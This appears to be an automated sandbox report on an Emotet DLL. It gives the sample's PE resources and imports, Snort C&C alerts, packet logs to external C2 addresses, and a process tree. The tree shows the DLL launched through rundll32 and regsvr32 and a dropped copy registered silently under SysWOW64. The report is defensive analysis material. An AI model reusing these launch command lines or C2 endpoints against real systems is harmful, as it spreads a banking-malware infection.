                                                                                                          RT_CURSOR0x6da000x134data
                                                                                                          RT_BITMAP0x6db340xb8data
                                                                                                          RT_BITMAP0x6dbec0x144data
                                                                                                          RT_ICON0x6dd300x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 67108992, next used block 3293332676SpanishMexico
                                                                                                          RT_ICON0x6e0180x128GLS_BINARY_LSB_FIRSTSpanishMexico
                                                                                                          RT_ICON0x6e1400x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 67108992, next used block 3293332676SpanishMexico
                                                                                                          RT_ICON0x6e4280x128GLS_BINARY_LSB_FIRSTSpanishMexico
                                                                                                          RT_ICON0x6e5500x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 67108992, next used block 3293332676SpanishMexico
                                                                                                          RT_ICON0x6e8380x128GLS_BINARY_LSB_FIRSTSpanishMexico
                                                                                                          RT_ICON0x6e9600x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 67108992, next used block 3293332676SpanishMexico
                                                                                                          RT_ICON0x6ec480x128GLS_BINARY_LSB_FIRSTSpanishMexico
                                                                                                          RT_ICON0x6ed700x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 67108992, next used block 3293332676SpanishMexico
                                                                                                          RT_ICON0x6f0580x128GLS_BINARY_LSB_FIRSTSpanishMexico
                                                                                                          RT_ICON0x6f1800x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 67108992, next used block 3293332676SpanishMexico
                                                                                                          RT_ICON0x6f4680x128GLS_BINARY_LSB_FIRSTSpanishMexico
                                                                                                          RT_ICON0x6f5900x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 67108992, next used block 3293332676SpanishMexico
                                                                                                          RT_ICON0x6f8780x128GLS_BINARY_LSB_FIRSTSpanishMexico
                                                                                                          RT_ICON0x6f9a00x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 67108992, next used block 3293332676SpanishMexico
                                                                                                          RT_ICON0x6fc880x128GLS_BINARY_LSB_FIRSTSpanishMexico
                                                                                                          RT_ICON0x6fdb00x10828dBase III DBT, version number 0, next free block index 40SpanishMexico
                                                                                                          RT_ICON0x805d80x10828dBase III DBT, version number 0, next free block index 40SpanishMexico
                                                                                                          RT_DIALOG0x90e000x12cdata
                                                                                                          RT_DIALOG0x90f2c0x134data
                                                                                                          RT_DIALOG0x910600xfedata
                                                                                                          RT_DIALOG0x911600x34data
                                                                                                          RT_STRING0x911940x52data
                                                                                                          RT_STRING0x911e80xb0Hitachi SH big-endian COFF object file, not stripped, 16640 sections, symbol offset=0x69007200, 201344768 symbols, optional header size 29952
                                                                                                          RT_STRING0x912980x30data
                                                                                                          RT_STRING0x912c80x1d0data
                                                                                                          RT_STRING0x914980x5bcdata
                                                                                                          RT_STRING0x91a540x31cdata
                                                                                                          RT_STRING0x91d700x300data
                                                                                                          RT_STRING0x920700xb0data
                                                                                                          RT_STRING0x921200xeedata
                                                                                                          RT_STRING0x922100x11edata
                                                                                                          RT_STRING0x923300x4d0data
                                                                                                          RT_STRING0x928000x248data
                                                                                                          RT_STRING0x92a480x2edata
                                                                                                          RT_STRING0x92a780x4cdata
                                                                                                          RT_GROUP_CURSOR0x92ac40x22Lotus unknown worksheet or configuration, revision 0x2
                                                                                                          RT_GROUP_CURSOR0x92ae80x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                          RT_GROUP_CURSOR0x92afc0x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                          RT_GROUP_CURSOR0x92b100x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                          RT_GROUP_CURSOR0x92b240x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                          RT_GROUP_CURSOR0x92b380x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                          RT_GROUP_CURSOR0x92b4c0x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                          RT_GROUP_CURSOR0x92b600x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                          RT_GROUP_CURSOR0x92b740x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                          RT_GROUP_CURSOR0x92b880x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                          RT_GROUP_CURSOR0x92b9c0x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                          RT_GROUP_CURSOR0x92bb00x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                          RT_GROUP_CURSOR0x92bc40x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                          RT_GROUP_CURSOR0x92bd80x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                          RT_GROUP_CURSOR0x92bec0x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                          RT_GROUP_ICON0x92c000x22dataSpanishMexico
                                                                                                          RT_GROUP_ICON0x92c240x22dataSpanishMexico
                                                                                                          RT_GROUP_ICON0x92c480x22dataSpanishMexico
                                                                                                          RT_GROUP_ICON0x92c6c0x22dataSpanishMexico
                                                                                                          RT_GROUP_ICON0x92c900x14dataSpanishMexico
                                                                                                          RT_GROUP_ICON0x92ca40x22dataSpanishMexico
                                                                                                          RT_GROUP_ICON0x92cc80x22dataSpanishMexico
                                                                                                          RT_GROUP_ICON0x92cec0x22dataSpanishMexico
                                                                                                          RT_GROUP_ICON0x92d100x22dataSpanishMexico
                                                                                                          RT_GROUP_ICON0x92d340x14dataSpanishMexico
                                                                                                          RT_VERSION0x92d480x314data
                                                                                                          RT_MANIFEST0x9305c0x56ASCII text, with CRLF line terminatorsEnglishUnited States

                                                                                                          Imports

                                                                                                          DLLImport
                                                                                                          KERNEL32.dllGetFileAttributesA, GetFileTime, GetTickCount, HeapAlloc, HeapFree, RtlUnwind, HeapReAlloc, VirtualProtect, VirtualAlloc, GetSystemInfo, VirtualQuery, GetCommandLineA, GetProcessHeap, RaiseException, HeapSize, VirtualFree, HeapDestroy, HeapCreate, GetStdHandle, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, Sleep, GetFileType, GetStartupInfoA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetSystemTimeAsFileTime, GetACP, GetStringTypeA, GetStringTypeW, GetTimeZoneInformation, GetConsoleCP, GetConsoleMode, LCMapStringA, LCMapStringW, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetEnvironmentVariableA, FileTimeToLocalFileTime, FileTimeToSystemTime, GetOEMCP, GetCPInfo, CreateFileA, GetFullPathNameA, GetVolumeInformationA, FindFirstFileA, FindClose, GetCurrentProcess, DuplicateHandle, GetThreadLocale, GetFileSize, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, GlobalFlags, WritePrivateProfileStringA, InterlockedIncrement, TlsFree, DeleteCriticalSection, LocalReAlloc, TlsSetValue, TlsAlloc, InitializeCriticalSection, GlobalHandle, GlobalReAlloc, EnterCriticalSection, TlsGetValue, LeaveCriticalSection, LocalAlloc, InterlockedDecrement, GlobalGetAtomNameA, GlobalFindAtomA, lstrcmpW, GetVersionExA, FreeResource, GetCurrentProcessId, GlobalAddAtomA, CloseHandle, GetCurrentThread, GetCurrentThreadId, ConvertDefaultLocale, GetModuleFileNameA, EnumResourceLanguagesA, GetLocaleInfoA, LoadLibraryA, lstrcmpA, FreeLibrary, GlobalDeleteAtom, GetModuleHandleA, GetProcAddress, GlobalFree, GlobalAlloc, GlobalLock, GlobalUnlock, FormatMessageA, LocalFree, MulDiv, SetLastError, ExitProcess, GetCurrencyFormatW, FindResourceA, LoadResource, LockResource, SizeofResource, lstrlenA, CompareStringW, CompareStringA, GetVersion, GetLastError, WideCharToMultiByte, MultiByteToWideChar, SetHandleCount, InterlockedExchange
                                                                                                          USER32.dllGetNextDlgGroupItem, MessageBeep, UnregisterClassA, RegisterClipboardFormatA, PostThreadMessageA, SetCapture, LoadCursorA, GetSysColorBrush, EndPaint, BeginPaint, GetWindowDC, ReleaseDC, GetDC, ClientToScreen, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, ShowWindow, MoveWindow, SetWindowTextA, IsDialogMessageA, SetDlgItemTextA, DestroyMenu, SetWindowContextHelpId, MapDialogRect, RegisterWindowMessageA, SendDlgItemMessageA, WinHelpA, IsChild, GetCapture, GetClassNameA, SetPropA, GetPropA, RemovePropA, SetFocus, InvalidateRgn, GetWindowTextA, GetForegroundWindow, GetTopWindow, UnhookWindowsHookEx, GetMessageTime, GetMessagePos, MapWindowPoints, SetForegroundWindow, UpdateWindow, GetMenu, CreateWindowExA, GetClassInfoExA, GetClassInfoA, RegisterClassA, GetSysColor, AdjustWindowRectEx, EqualRect, CopyRect, PtInRect, GetDlgCtrlID, DefWindowProcA, CallWindowProcA, SetWindowLongA, SetWindowPos, OffsetRect, IntersectRect, SystemParametersInfoA, GetWindowPlacement, GetWindowRect, GetWindow, GetDesktopWindow, SetActiveWindow, CreateDialogIndirectParamA, CharUpperA, DrawIcon, AppendMenuA, DestroyWindow, IsWindow, GetDlgItem, GetNextDlgTabItem, EndDialog, GetWindowThreadProcessId, GetWindowLongA, GetLastActivePopup, IsWindowEnabled, MessageBoxA, SetCursor, SetWindowsHookExA, InvalidateRect, SetRect, IsRectEmpty, CopyAcceleratorTableA, CharNextA, ReleaseCapture, SendMessageA, GetSystemMenu, IsIconic, GetClientRect, EnableWindow, LoadIconA, GetSystemMetrics, GetSubMenu, GetMenuItemCount, GetMenuItemID, GetMenuState, PostQuitMessage, PostMessageA, CheckMenuItem, EnableMenuItem, ModifyMenuA, GetParent, GetFocus, LoadBitmapA, GetMenuCheckMarkDimensions, SetMenuItemBitmaps, ValidateRect, GetCursorPos, PeekMessageA, GetKeyState, IsWindowVisible, GetActiveWindow, DispatchMessageA, TranslateMessage, GetMessageA, CallNextHookEx, GetClassLongA
                                                                                                          GDI32.dllSetWindowExtEx, ScaleWindowExtEx, ExtSelectClipRgn, DeleteDC, GetStockObject, GetBkColor, GetTextColor, CreateRectRgnIndirect, GetRgnBox, GetMapMode, ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, SetViewportOrgEx, SelectObject, Escape, TextOutA, RectVisible, PtVisible, GetDeviceCaps, GetViewportExtEx, DeleteObject, SetMapMode, RestoreDC, SaveDC, ExtTextOutA, GetObjectA, SetBkColor, SetTextColor, GetClipBox, CreateBitmap, GetWindowExtEx
                                                                                                          comdlg32.dllGetFileTitleA
                                                                                                          WINSPOOL.DRVDocumentPropertiesA, OpenPrinterA, ClosePrinter
                                                                                                          ADVAPI32.dllRegSetValueExA, RegCreateKeyExA, RegQueryValueA, RegEnumKeyA, RegDeleteKeyA, RegOpenKeyExA, RegQueryValueExA, RegOpenKeyA, RegCloseKey
                                                                                                          SHLWAPI.dllPathFindFileNameA, PathStripToRootA, PathFindExtensionA, PathIsUNCA
                                                                                                          oledlg.dll
                                                                                                          ole32.dllOleInitialize, CoFreeUnusedLibraries, OleUninitialize, CreateILockBytesOnHGlobal, StgCreateDocfileOnILockBytes, StgOpenStorageOnILockBytes, CoGetClassObject, CLSIDFromString, CoRevokeClassObject, CoTaskMemAlloc, CoTaskMemFree, OleIsCurrentClipboard, OleFlushClipboard, CoRegisterMessageFilter, CLSIDFromProgID
                                                                                                          OLEAUT32.dllVariantChangeType, VariantInit, SysAllocStringLen, SysFreeString, SysStringLen, SysAllocStringByteLen, OleCreateFontIndirect, VariantTimeToSystemTime, SystemTimeToVariantTime, SafeArrayDestroy, SysAllocString, VariantCopy, VariantClear

                                                                                                          Exports

                                                                                                          NameOrdinalAddress
                                                                                                          DllRegisterServer10x1000373c

                                                                                                          Possible Origin

                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                          SpanishMexico
                                                                                                          EnglishUnited States

                                                                                                          Network Behavior

                                                                                                          Snort IDS Alerts

                                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                          192.168.2.551.91.76.894981680802404338 07/20/22-01:12:50.117023TCP2404338ET CNC Feodo Tracker Reported CnC Server TCP group 20498168080192.168.2.551.91.76.89
                                                                                                          192.168.2.5119.193.124.414982770802404304 07/20/22-01:12:52.851489TCP2404304ET CNC Feodo Tracker Reported CnC Server TCP group 3498277080192.168.2.5119.193.124.41

                                                                                                          Network Port Distribution

                                                                                                          TCP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jul 20, 2022 01:12:28.345110893 CEST49766443192.168.2.570.36.102.35
                                                                                                          Jul 20, 2022 01:12:28.345185041 CEST4434976670.36.102.35192.168.2.5
                                                                                                          Jul 20, 2022 01:12:28.345278025 CEST49766443192.168.2.570.36.102.35
                                                                                                          Jul 20, 2022 01:12:28.365789890 CEST49766443192.168.2.570.36.102.35
                                                                                                          Jul 20, 2022 01:12:28.365828991 CEST4434976670.36.102.35192.168.2.5
                                                                                                          Jul 20, 2022 01:12:28.540317059 CEST4434976670.36.102.35192.168.2.5
                                                                                                          Jul 20, 2022 01:12:28.553242922 CEST49767443192.168.2.570.36.102.35
                                                                                                          Jul 20, 2022 01:12:28.553294897 CEST4434976770.36.102.35192.168.2.5
                                                                                                          Jul 20, 2022 01:12:28.553361893 CEST49767443192.168.2.570.36.102.35
                                                                                                          Jul 20, 2022 01:12:28.554018974 CEST49767443192.168.2.570.36.102.35
                                                                                                          Jul 20, 2022 01:12:28.554048061 CEST4434976770.36.102.35192.168.2.5
                                                                                                          Jul 20, 2022 01:12:28.727739096 CEST4434976770.36.102.35192.168.2.5
                                                                                                          Jul 20, 2022 01:12:28.734802961 CEST49768443192.168.2.570.36.102.35
                                                                                                          Jul 20, 2022 01:12:28.734843016 CEST4434976870.36.102.35192.168.2.5
                                                                                                          Jul 20, 2022 01:12:28.734922886 CEST49768443192.168.2.570.36.102.35
                                                                                                          Jul 20, 2022 01:12:28.738056898 CEST49768443192.168.2.570.36.102.35
                                                                                                          Jul 20, 2022 01:12:28.738120079 CEST4434976870.36.102.35192.168.2.5
                                                                                                          Jul 20, 2022 01:12:28.738195896 CEST49768443192.168.2.570.36.102.35
                                                                                                          Jul 20, 2022 01:12:28.803554058 CEST497698080192.168.2.592.240.254.110
                                                                                                          Jul 20, 2022 01:12:31.969569921 CEST497698080192.168.2.592.240.254.110
                                                                                                          Jul 20, 2022 01:12:37.970036030 CEST497698080192.168.2.592.240.254.110
                                                                                                          Jul 20, 2022 01:12:50.117022991 CEST498168080192.168.2.551.91.76.89
                                                                                                          Jul 20, 2022 01:12:50.140120029 CEST80804981651.91.76.89192.168.2.5
                                                                                                          Jul 20, 2022 01:12:50.783684015 CEST498168080192.168.2.551.91.76.89
                                                                                                          Jul 20, 2022 01:12:50.803967953 CEST80804981651.91.76.89192.168.2.5
                                                                                                          Jul 20, 2022 01:12:51.488040924 CEST498168080192.168.2.551.91.76.89
                                                                                                          Jul 20, 2022 01:12:51.512299061 CEST80804981651.91.76.89192.168.2.5
                                                                                                          Jul 20, 2022 01:12:51.524338007 CEST498228080192.168.2.5217.182.25.250
                                                                                                          Jul 20, 2022 01:12:51.558746099 CEST808049822217.182.25.250192.168.2.5
                                                                                                          Jul 20, 2022 01:12:52.080899000 CEST498228080192.168.2.5217.182.25.250
                                                                                                          Jul 20, 2022 01:12:52.109123945 CEST808049822217.182.25.250192.168.2.5
                                                                                                          Jul 20, 2022 01:12:52.783854008 CEST498228080192.168.2.5217.182.25.250
                                                                                                          Jul 20, 2022 01:12:52.811814070 CEST808049822217.182.25.250192.168.2.5
                                                                                                          Jul 20, 2022 01:12:52.851489067 CEST498277080192.168.2.5119.193.124.41
                                                                                                          Jul 20, 2022 01:12:53.111404896 CEST708049827119.193.124.41192.168.2.5
                                                                                                          Jul 20, 2022 01:12:53.111524105 CEST498277080192.168.2.5119.193.124.41
                                                                                                          Jul 20, 2022 01:12:53.115263939 CEST498277080192.168.2.5119.193.124.41
                                                                                                          Jul 20, 2022 01:12:53.375121117 CEST708049827119.193.124.41192.168.2.5
                                                                                                          Jul 20, 2022 01:12:53.388797045 CEST708049827119.193.124.41192.168.2.5
                                                                                                          Jul 20, 2022 01:12:53.388885021 CEST708049827119.193.124.41192.168.2.5
                                                                                                          Jul 20, 2022 01:12:53.388910055 CEST498277080192.168.2.5119.193.124.41
                                                                                                          Jul 20, 2022 01:12:53.388953924 CEST498277080192.168.2.5119.193.124.41
                                                                                                          Jul 20, 2022 01:12:54.101490974 CEST498277080192.168.2.5119.193.124.41
                                                                                                          Jul 20, 2022 01:12:54.362796068 CEST708049827119.193.124.41192.168.2.5
                                                                                                          Jul 20, 2022 01:12:54.362960100 CEST498277080192.168.2.5119.193.124.41
                                                                                                          Jul 20, 2022 01:12:54.369782925 CEST498277080192.168.2.5119.193.124.41
                                                                                                          Jul 20, 2022 01:12:54.672770023 CEST708049827119.193.124.41192.168.2.5
                                                                                                          Jul 20, 2022 01:12:55.549302101 CEST708049827119.193.124.41192.168.2.5
                                                                                                          Jul 20, 2022 01:12:55.549442053 CEST498277080192.168.2.5119.193.124.41
                                                                                                          Jul 20, 2022 01:12:58.549236059 CEST708049827119.193.124.41192.168.2.5
                                                                                                          Jul 20, 2022 01:12:58.549263000 CEST708049827119.193.124.41192.168.2.5
                                                                                                          Jul 20, 2022 01:12:58.549376965 CEST498277080192.168.2.5119.193.124.41
                                                                                                          Jul 20, 2022 01:14:18.243630886 CEST498277080192.168.2.5119.193.124.41
                                                                                                          Jul 20, 2022 01:14:18.243719101 CEST498277080192.168.2.5119.193.124.41

                                                                                                          Statistics

                                                                                                          CPU Usage

                                                                                                          Click to jump to process

                                                                                                          Memory Usage

                                                                                                          Click to jump to process

                                                                                                          High Level Behavior Distribution

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Behavior

                                                                                                          Click to jump to process

                                                                                                          System Behavior

                                                                                                          General

                                                                                                          Target ID:0
                                                                                                          Start time:01:12:00
                                                                                                          Start date:20/07/2022
                                                                                                          Path:C:\Windows\System32\loaddll32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:loaddll32.exe "C:\Users\user\Desktop\xhOJLzQSe7.dll"
                                                                                                          Imagebase:0x3e0000
                                                                                                          File size:116736 bytes
                                                                                                          MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Target ID:1
                                                                                                          Start time:01:12:01
                                                                                                          Start date:20/07/2022
                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\xhOJLzQSe7.dll",#1
                                                                                                          Imagebase:0x1100000
                                                                                                          File size:232960 bytes
                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Target ID:2
                                                                                                          Start time:01:12:02
                                                                                                          Start date:20/07/2022
                                                                                                          Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:regsvr32.exe /s C:\Users\user\Desktop\xhOJLzQSe7.dll
                                                                                                          Imagebase:0xc40000
                                                                                                          File size:20992 bytes
                                                                                                          MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.471795717.00000000043F1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.471795717.00000000043F1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.471763679.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.471763679.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Target ID:3
                                                                                                          Start time:01:12:02
                                                                                                          Start date:20/07/2022
                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:rundll32.exe "C:\Users\user\Desktop\xhOJLzQSe7.dll",#1
                                                                                                          Imagebase:0xca0000
                                                                                                          File size:61952 bytes
                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.465962452.0000000000C01000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.465962452.0000000000C01000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.465829043.0000000000BB0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.465829043.0000000000BB0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Target ID:4
                                                                                                          Start time:01:12:03
                                                                                                          Start date:20/07/2022
                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:rundll32.exe C:\Users\user\Desktop\xhOJLzQSe7.dll,DllRegisterServer
                                                                                                          Imagebase:0xca0000
                                                                                                          File size:61952 bytes
                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.466876693.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.466876693.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.466979688.0000000003281000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.466979688.0000000003281000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Target ID:6
                                                                                                          Start time:01:12:08
                                                                                                          Start date:20/07/2022
                                                                                                          Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Smcoeugpjqpltwaq\padmvjcc.wwg"
                                                                                                          Imagebase:0xc40000
                                                                                                          File size:20992 bytes
                                                                                                          MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000006.00000002.972201454.0000000002F01000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.972201454.0000000002F01000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000006.00000002.972129886.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.972129886.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Target ID:8
                                                                                                          Start time:01:12:20
                                                                                                          Start date:20/07/2022
                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                          Imagebase:0x7ff78ca80000
                                                                                                          File size:51288 bytes
                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Target ID:12
                                                                                                          Start time:01:12:42
                                                                                                          Start date:20/07/2022
                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                          Imagebase:0x7ff78ca80000
                                                                                                          File size:51288 bytes
                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Target ID:13
                                                                                                          Start time:01:12:42
                                                                                                          Start date:20/07/2022
                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                          Imagebase:0x7ff78ca80000
                                                                                                          File size:51288 bytes
                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:17
                                                                                                          Start time:01:13:24
                                                                                                          Start date:20/07/2022
                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                          Imagebase:0x7ff78ca80000
                                                                                                          File size:51288 bytes
                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:19
                                                                                                          Start time:01:13:51
                                                                                                          Start date:20/07/2022
                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                          Imagebase:0x7ff78ca80000
                                                                                                          File size:51288 bytes
                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:21
                                                                                                          Start time:01:14:14
                                                                                                          Start date:20/07/2022
                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                          Imagebase:0x7ff78ca80000
                                                                                                          File size:51288 bytes
                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          Disassembly

                                                                                                          Reset < >

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:3.1%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:22.6%
                                                                                                            Total number of Nodes:452
                                                                                                            Total number of Limit Nodes:15
